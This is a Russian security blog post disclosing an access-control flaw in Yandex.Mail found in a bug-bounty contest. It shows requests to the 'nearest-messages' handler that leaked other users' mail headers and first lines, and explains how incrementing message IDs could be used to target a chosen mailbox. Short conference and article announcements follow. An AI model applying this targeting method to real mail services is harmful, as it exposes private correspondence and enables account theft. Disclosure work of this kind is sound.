<img id="bxid_681324" src="http://www.securitylab.ru/upload/blog/ec4/ec4f7d5b8e7b38acb404e1ff005c6360.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Антон Карпов aka toxa (</span><a href="http://habrahabr.ru/users/tokza/" id="bxid_779577" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">tokza</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">) рассказывает, как будут оцениваться найденные баги.</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">FrontEnd</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Основным скриптом по доставке контента почты является некий handlers.jsx. Примечательно, что информацией по архитектуре почты сами разработчики охотно делятся, так что мы знаем, что в данном случае имеем дело с </span><a href="http://download.yandex.ru/company/experience/subbotnik/chel_androsov.pdf" id="bxid_774399" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">серверным JavaScript</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. Однако мне все эти тонкости не понадобились, так как первая же найденная там уязвимость оказалась настолько классической, что детали реализации не так уж и существенны. Но сначала общие детали:</span><br />
<br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>Запрос к handlers.jsx может быть как POST, так и GET</li>
<li>В запросе указывается нужный модуль и соответствующие ему параметры</li>
<li>В ответ на запрос приходит контент в виде XML</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Некоторые модули и их смысл:</span><br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>“folders” – содержимое папок</li>
<li>“message-body” – тело письма</li>
<li>“nearest-messages” – соседние письма</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Чтобы было нагляднее, приведу скриншот из той же презентации Алексея Андросова. </span><br />
<br />
<img id="bxid_866091" src="http://www.securitylab.ru/upload/blog/612/612f63537b68f468c80015a205ddcc55.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">То есть видно, что весь контент собирается в общий интерфейс с помощью AJAX-запросов и приводится в «человеческий» вид благодаря XSL-шаблонам.</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Ну и пример запроса из той же презы:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">/handlers.jsx?_handlers.0=message&ids=1234567890&_handlers.1=message&ids=1234567891</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Ответ в виде XML:</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handlers> <handler name=”message” key=”_h=message&ids=1234567890”> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> <!-- данные --> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </handler> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handler name="message" key="_h=message&ids=1234567891"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> <!-- данные --> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </handler> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></handlers> </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Вроде все просто. Параметр _handlers определят нужные нам данные (модуль обработчика), а ids – это идентификатор. То есть данный пример запроса загружает письма с идентификаторами 1234567890 и 1234567891. Естественно, первое, что попробовал я – это подменить ids и подставить туда, например, 123431337, что, в идеале, должно было бы вернуть мне письмо с этим идентификатором, даже если оно не мое. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">У меня ничего не получилось. Кстати, то же самое действие предпринимал и мой коллега и друг — </span><a href="http://habrahabr.ru/users/chipik/" id="bxid_871742" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">chipik</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. В прошлом году мы с ним на пару уже ломали Google (и мы писали о том, </span><a href="http://habrahabr.ru/company/dsec/blog/140882/" id="bxid_696754" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">как это было</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">). Но и у него тоже ничего не получилось. Однако вот ведь забавная штука: есть такое понятие – «покрытие кода». То есть, предприняв некое проверочное действие, мы проверили часть кода. Логично предположить, что если попробовать подменить имя модуля, то все равно за проверку авторизации доступа по идентификатору ids отвечает тот же самый код. Но небольшая удача помогла понять, что это не так. </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Бага</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Через какое-то время я опять решил подменить ids, но уже для другого модуля – “</span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">nearest-messages</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">”, и о чудо… Я сначала даже не понял, как это произошло, но позже убедился, что это единственный модуль, который не проверяет, принадлежит ли ids письма текущему пользователю. Это означает, что с помощью этого модуля я мог подгружать «соседние письма» других пользователей сервера! Давайте разберем легитимный запрос:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">http:// mail.yandex.ru/neo2/handlers/handlers.jsx?_handlers=message-nearest&ids=2020000002590081157</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">2020000002590081157 – это ids моего письма, вполне конкретного и определенного. На этот запрос сервер Яндекса возвращает:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">(... – вырезано для сокращения объема)</span><br />
<br />
<br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handlers> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><handler name="message-nearest" gid="0" key="_handler=message-nearest&ids=2020000002590081157"> <message-nearest> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><list> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><message id="2020000002590182740"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><thread id="2020000001499988536"/> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><folder id="2020000650059912118"/> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><date> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><timestamp>1320143331000</timestamp></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><iso>2011-11-01T14:28:51</iso></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><short>01.11.11</short></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><full>1 ноя. 2011 в 14:28</full></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></date></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><size>2 КБ</size></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><last_status/></span><br />
<b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><subject fwd="Fwd:">TEST</subject></b><br />
<br />
<b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><firstline>Привет, это тестовое письмо номер 2</firstline></b><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><to> </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><name>ne_eik01110d111@yandex.ru</name> </b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. . . </to> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><from> <name>SSS AAA</name> . . . </from> </span><br />
<b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><reply-to> <name>ddookie1@inbox.ru</name> </b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">… </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></message> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><message id="2020000002590081157"></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">..</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></message> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><message id="2020000002590076913"> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> . . . </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"></message> </list> </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><timer_db>266</timer_db> </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><timer_logic>175197</timer_logic> </message-nearest> </handler> </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><login>ne_eik01110d111</login> <actual-version>5.11.55</actual-version> <timestamp>1335882564270</timestamp> </handlers> </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Сервер возвращает XML с тремя объектами. Каждый объект – это информация о письме:</span><br />
<br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>Когда</li>
<li>От кого</li>
<li>Кому</li>
<li>Заголовок</li>
<li>Первая строчка тела письма</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Причем то сообщение, ids которого указывается в запросе, идет вторым объектом. Первый и третий объект – соседние сообщения в той же папке, где находится запрашиваемый объект. Меняя ids, например, на единицу, мы получаем </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">три</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> чужих сообщения. Вернее, дату получения, заголовки, адресаты, идентификатор ids и первую строку письма. Но на самом деле первая строка – не просто первая строка! Опыт показал, что туда может входить </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">несколько</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> строк, и главное тут – объем и количество переводов строки. В моих опытах были результаты и по 5 строк! То есть объем достаточно большой, чтобы говорить о реальной угрозе.</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Отправлено в теле письма:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Привет – строка 1</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Ага, это тесто – строка 3</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Ха-ха-ха-ха-ха-хавыавыаывавыавыавыавыавыавыа – строка 4</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыы – строка 5</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыфыф – строка 6</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Пока – 8 </span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Твой тестер! – 9</span><br />
<br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Перехвачено с помощью handlers.jsx:</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><firstline> – строка 1 Ага, это тесто – строка 3 Ха-ха-ха-ха-ха-хавыавыаывавыавыавыавыавыавыа – строка 4 фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыы – строка 5 фыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыыфыф – строка 6 Пока </firstline> </span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Как видно, этого объема данных достаточно, чтобы нарушать конфиденциальность и даже чтобы угонять акки с сервисов, которые шлют регистрационные данные на e-mail (например Facebook).</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Мало-мало</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">В общем, все понятно – бага простейшая, но есть пара вопросов:</span><br />
<br />
<ul style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<li>Как получить доступ к НУЖНОМУ ящику?!</li>
<li>Как получить НУЖНОЕ письмо в ящике?</li>
</ul>
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Именно эти вопросы задал бы любой адекватный взломщик, которого интересуют более точечные и целевые атаки. Ведь мы имеем дело с ids, а знать ids вражеского письма нам не всегда дано (почти никогда). Таким образом, атака становится чуть более опасной и интересной с точки зрения техники (ids подменить почти каждый может, а вот вычислить его…)</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">И есть еще кое-какие детали, которые также были выяснены опытным путем. Оказывается, ids – это не просто идентификатор письма или папки, это фактически объект. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Первые 4 цифры – это номер ноды (я не в курсе, как это правильно называется, поэтому буду называть так), на которой хостится ящик. Если вы обратите внимание, то заметите, что у всех ваших писем и папок этот номер постоянный. Поэтому с помощью выявленной уязвимости можно читать письма только с ТОЙ САМОЙ ноды, где расположен ваш ящик. На одной ноде несколько миллиардов писем! Нод много, и два одновременно зарегистрировавшихся пользователя могут попасть на разные ноды. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">В середине идентификатор типа – папка или сообщение (у сообщения 00, у папки вроде 65), а последние цифры – идентификатор сообщения на ноде. Вот как раз только последнее менять и можно. То есть в моем примере текущее сообщение было с номером 259008115</span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">7</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. Теперь вы примерно представляете объем сообщений на одной ноде. </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Второй забавный факт: идентификатор сообщения – абсолютное, инкрементируемое значение. То есть следующее письмо, обработанное (полученное) текущей нодой, будет 259008115</span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">8</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">. Даже если это письмо будет направлено не мне. Вот теперь можно решить ОБЕ задачи. То есть выполнить целевую атаку, а не тупо сдампить миллиард писем </span><img id="bxid_458605" src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_cool.gif" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="Здорово" /><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Атака</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Необходимо создать почтовый ящик на той же ноде, что и у жертвы. Задача трудно решается, если ящик жертвы зарегистрирован давно. Можно выкупить или угнать ящики с разных нод и зарегистрировать ящики на тех нодах, где это возможно. Но если ящик жертвы создан недавно, то атака имеет стопроцентную вероятность успеха. Так, например, будем атаковать ящик </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">target-mail1</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">@yandex.ru. Он у нас создан недавно. Поэтому успех атаки высок. Итак, создаем кучу ящиков: </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">check-mail1</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">check-mail2</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">check-mail3</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> и т.д. Главное, чтобы все создаваемые ящики были на разных нодах. После чего отправляем письмо на target-mail1 и в копию ставим все созданные нами ящики. </span><br />
<br />
<img id="bxid_342464" src="http://www.securitylab.ru/upload/blog/41e/41ed5e5fcf09fa915e9e8840697918fd.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">В чем юмор? Когда мы увидим ids письма в наших аккаунтах “check-mail”, то попробуем сделать инкремент и декремент этого значения на 5 единиц. И на той ноде, где check-mailN совпал с target-mail1, мы увидим наше письмо. Смотрите пример:</span><br />
<br />
<img id="bxid_798786" src="http://www.securitylab.ru/upload/blog/18d/18d00e1b26e06c923d9bd3ccd879445c.png" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="" /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Так мы можем получить доступ к целевому ящику. А что же с целевым письмом? А вот если вспомнить, то тот модуль, через который мы эксплуатируем уязвимость, показывает нам соседние письма в той же папке того же ящика (помните, что скрипт показывает </span><b style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">три</b><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> сообщения: то что указано в ids, и два соседних из того же ящика). Если выбранное письмо последнее, то покажут нам только два письма: текущее и предыдущее, включая его ids. Это значит, что мы можем выбрать этот ids для следующего запроса: тогда мы увидим его вторым объектом в XML-ответе, а третьим будет еще более старое письмо. Потом мы берем уже его ids и так «скользим» вниз, пока не прочтем все сохраненные в папке письма и не найдем искомое.</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Выводы</span><br />
<br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Покрытие кода при тестах на проникновение и фаззинге – иногда ключевой параметр. Здесь мы увидели отличный пример, когда все пробовали менять ids для модуля “message-body”, видели, что запрос не прокатывает, и потому не стали делать аналогичные тесты с другими, менее очевидными модулями.</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Хоть уязвимость и простая, сама атака достаточно сложная и требует анализа генерации ids и архитектуры нод. Эксплуатировать уязвимость интереснее, чем просто искать «дыру». Это был интересный челлендж по угону конкретного письма с конкретного ящика. Это сложно для старых ящиков, но все же можно, а для свежесозданных ящиков вероятность успеха 100%. Для старых –зависит от возможности завести почтовый ящик на той же ноде. Статистика по свежим регам: каждый третий или четвертый созданный ящик попадает на одну и ту же ноду. Период возможности регистрации на ноде с момента ее запуска – около полугода (то есть «новый»/«свежесозданный» ящик, это ящик созданный не далее чем пол года назад). По идее, потом, спустя полгода, зарегистрироваться на этой ноде уже, как я догадываюсь, нельзя -перегружена.</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Благодарности:</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Антону Карпову (</span><a href="http://habrahabr.ru/users/tokza/" id="bxid_631088" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">tokza</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">) и компании «Яндекс» – за интересный челлендж и конкурс, ну и за второе место. Ведь уязвимости есть везде, а такой конкурс помог закрыть многие из них!</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Дмитрию Частухину (</span><a href="http://habrahabr.ru/users/chipik/" id="bxid_454734" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">chipik</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">) – за то, что не сильно расстроился, когда узнал о баге, которую «уже проверял»…</span><br />
<a href="http://habrahabr.ru/users/d0znpp/" id="bxid_179720" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">d0znpp</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><a href="http://habrahabr.ru/users/kyprizel/" id="bxid_556513" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">kyprizel</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, </span><a href="http://habrahabr.ru/users/ptsecurity/" id="bxid_768086" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">ptsecurity</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> – за участие в конкурсе и за нахождение страшных дырок, что не позволяло мне расслабиться весь месяц (ненавижу конкурсы).</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Напоследок пруф-видео…</span><br />
<br />
<a href="http://www.youtube.com/watch?feature=player_embedded&v=WWU7MXYT5D8" id="bxid_73529" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">http://www.youtube.com/watch?feature=player_embedded&v=WWU7MXYT5D8</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Всем пока!</span><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">PS: Так как я не сотрудник «Яндекса», детали архитектуры, алгоритмы и названия могут быть недостоверными. Все выводы об устройстве «Яндекс.Почты» основаны на внутренних ощущениях и интуитивном видении автора.</span>
</div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-23160779606654445912012-05-21T05:41:00.001-07:002012-05-21T05:41:46.755-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="margin-bottom: .0001pt; margin: 0cm;">
<span style="font-size: 13.5pt;">Мы на конференциях.<o:p></o:p></span></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<br /></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<span style="font-size: 13.5pt;">24 и 25 мая мои коллеги, Дима Евдокимов и Саша Миноженко поедут в
Краков на CONFidence. К сожалению, из-за временных проблем с визой я пропущу
это действо. Я очень скорблю, ведь Конфиденц это мега-угарное мероприятие с
неповторимой атмосферой. Кроме того, одним из спикеров в Кракове будет сам
Капитан Кранч (для тех кто не в курсе - <a href="http://en.wikipedia.org/wiki/John_Draper">http://en.wikipedia.org/wiki/John_Draper</a>).
Дополнительно отмечу, что Российскую делегацию спикеров дополнят товарищи из Москвы
- Андрей Петухов и Карим Валиев. <o:p></o:p></span></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<br /></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<span style="font-size: 13.5pt;">30 и 31 мая пройдет не менее замечательное событие - PHDays. Туда
я уже попаду, как и многие другие ребята из D</span><span lang="EN-US" style="font-size: 13.5pt;">SEC</span><span style="font-size: 13.5pt;"> и DCG 7812. Так что, надеюсь, будет
весело 8)<o:p></o:p></span></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<br /></div>
<div style="margin: 0cm 0cm 0.0001pt;">
<span style="font-size: 13.5pt;">P.S. Мы, кстати, так же подготовили футболку к конкурсу на PHDays,
аналогичную той, за которую Денис из </span><span lang="EN-US" style="font-size: 13.5pt;">PT</span><span style="font-size: 13.5pt;"> получили приз на Zeronights 8)</span><span lang="EN-US" style="font-size: 13.5pt;"><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0cm;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0cm;">
<span lang="EN-US" style="font-size: 13.5pt;">P</span><span style="font-size: 13.5pt;">.</span><span lang="EN-US" style="font-size: 13.5pt;">P</span><span style="font-size: 13.5pt;">.</span><span lang="EN-US" style="font-size: 13.5pt;">S</span><span style="font-size: 13.5pt;"><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0cm;">
<span style="font-size: 13.5pt;">Мы с Сашей Миноженко расскажем про взлом </span><span lang="EN-US" style="font-size: 13.5pt;">VMware</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span lang="EN-US" style="font-size: 13.5pt;">vCenter</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span style="font-size: 13.5pt;"> сервера, а так же
про один 0дэй, который не запатчен. Ребята из </span><span lang="EN-US" style="font-size: 13.5pt;">VMware</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span style="font-size: 13.5pt;">по этому поводу переживают, но на самом деле этот 0дэей
трудно заэксплойтить без дополнительной баги, которую, мы и нашли в </span><span lang="EN-US" style="font-size: 13.5pt;">VMware</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span lang="EN-US" style="font-size: 13.5pt;">vCenter</span><span style="font-size: 13.5pt;"> (</span><span lang="EN-US" style="font-size: 13.5pt;">web</span><span lang="EN-US" style="font-size: 13.5pt;"> </span><span style="font-size: 13.5pt;">бага). Только о второй баге мы сообщили им, так что она
запатчена и потому первую трудно теперь заэксплойтить (до тех пор, пока не
найдут еще какую-нибудь похожую багу).<o:p></o:p></span></div>
</div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-15696348958308097872012-04-16T02:48:00.005-07:002012-04-16T03:10:12.567-07:00Учимся ломать...<span><span style="font-size: 100%;">Продолжаем на хабре серию постов про взлом различных сервисов.</span></span><br /><span><span style="font-size: 100%;">Собственно кросс-постить не хочу. Дам лишь краткое описание и линки:</span></span><div style="font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "><br /></div><div style="font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "><h1 class="title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(118, 118, 118); font-family: 'normal Verdana', Tahoma, sans-serif; font-weight: normal; line-height: 31px; background-color: rgb(255, 255, 255); "><a href="http://habrahabr.ru/company/dsec/blog/141275/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font-size: 27px; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Проникновение в Lotus Domino</a></h1><div>Уже боянистая тема, но до сих пор не закрытый зеро-дей в Lotus Domino.<br />Описание ошибки, описание эксплойта:</div><div><br /></div><h1 class="title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(118, 118, 118); font-family: 'normal Verdana', Tahoma, sans-serif; font-weight: normal; line-height: 31px; background-color: rgb(255, 255, 255); "><a href="http://habrahabr.ru/company/dsec/blog/141684/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font-size: 27px; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Ломаем банк в стиле smash the stack!</a></h1></div><div><span><span style="font-size: 100%;">Взлом </span>отечественной<span style="font-size: 100%;"> системы ДБО. Поиск классической strcpy уязвимости НЕ </span>глупым<span style="font-size: 100%;"> фаззингом. Создание ROP эксплойта.</span></span></div><div><br /></div><div><h1 class="title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(118, 118, 118); font-family: 'normal Verdana', Tahoma, sans-serif; font-weight: normal; line-height: 31px; background-color: rgb(255, 255, 255); "><a href="http://habrahabr.ru/company/dsec/blog/141838/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font-size: 27px; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Боевой HID-эмулятор на Arduino</a></h1></div><div>Используем "Teensy" для выполнения произвольного кода через эмуляцию HID устройства. Обход Device-Locker 8)</div><div><br /></div><div><a href="http://habrahabr.ru/company/dsec/blog/142166/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; 